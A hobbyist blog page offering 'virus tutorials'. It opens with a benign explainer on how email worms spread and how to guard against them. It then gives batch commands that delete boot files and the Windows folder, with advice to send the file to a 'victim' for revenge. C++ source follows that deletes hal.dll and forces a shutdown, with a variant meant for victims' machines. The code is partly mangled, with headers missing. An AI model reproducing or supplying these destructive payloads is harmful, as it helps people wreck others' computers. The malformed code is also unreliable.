PC TIPS AND TRICKS

αℓℓ αяє ωєℓ¢σмє тσ συя ѕιтє:
נσιη υѕ αη∂ Ⴣαιℓє συя ѕєяνι¢єѕ
lyk us on fb to get updaed:

νιяυѕ тυтσяιαℓѕ!!!!!!!!

here the virus indicating a worm and not virumandi santhanam in nanban film, nw let cum to the chapter!!!!!! ================================================================================================== *************************HOW DOES WORMS WORK ?********************************************* ================================================================================================== People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes. Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files. What's a worm? A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet. How do they spread? When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001). If you click on the attachment to open it, you'll activate the worm, but in some versions of Microsoft Outlook, you don't even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches. After it's activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program's address book and web pages you've recently looked at, to find them. Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn't even have to be open for the worm to spread. Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.
What do they do? Most of the damage that worms do is the result of the traffic they create when they're spreading. They clog e-mail servers and can bring other internet applications to a crawl. But worms will also do other damage to computer systems if they aren't cleaned up right away. The damage they do, known as the payload, varies from one worm to the next. The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it. The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO's proprietary code. A second version of MyDoom targeted the website of software giant Microsoft. The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet. How do I get rid of them? The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe. Never open attachments you aren't expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.) Also, install anti-virus software and keep it up to date with downloads from the software maker's website. The updates are usually automatic. Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves. As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don't affect computers that run Macintosh or Linux operating systems ================================================================================================ ***********************CREAE YOUR OWN VIRUS************************************** =============================================================================================== Yes Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible. First of all Open your notepad and type the following......... del c:\boot।ini c:\del autoexec.bat Now Save as anyname.exe. Create this in C: drive The only thing you need is Notepad. Create a text file called TEST.txt(empty) in C:\ Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then save it as "Test.cmd". Now run the file "Test.cmd"go to C:\ and you'll see your Test.txt is gone. Now, the real work : Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd. Now DON'T Run the file or you'll lose your WINDOWS map. So, that's the Virus. In this way you can make a virus to delete any file you want. Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again. Beware : Its simple but a strong virus that can delete anyones Windows OS ...Note : I am not Taking any Responsibilties if by this you damage your windows. =============================================================================================== ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~POWERFUL C++ VIRUS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ================================================================================================ This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again. Warning: Do not try this on your home computer. The Original Code: Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is: Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

No comments:

Post a Comment

copyrightedPCTT ---sitemap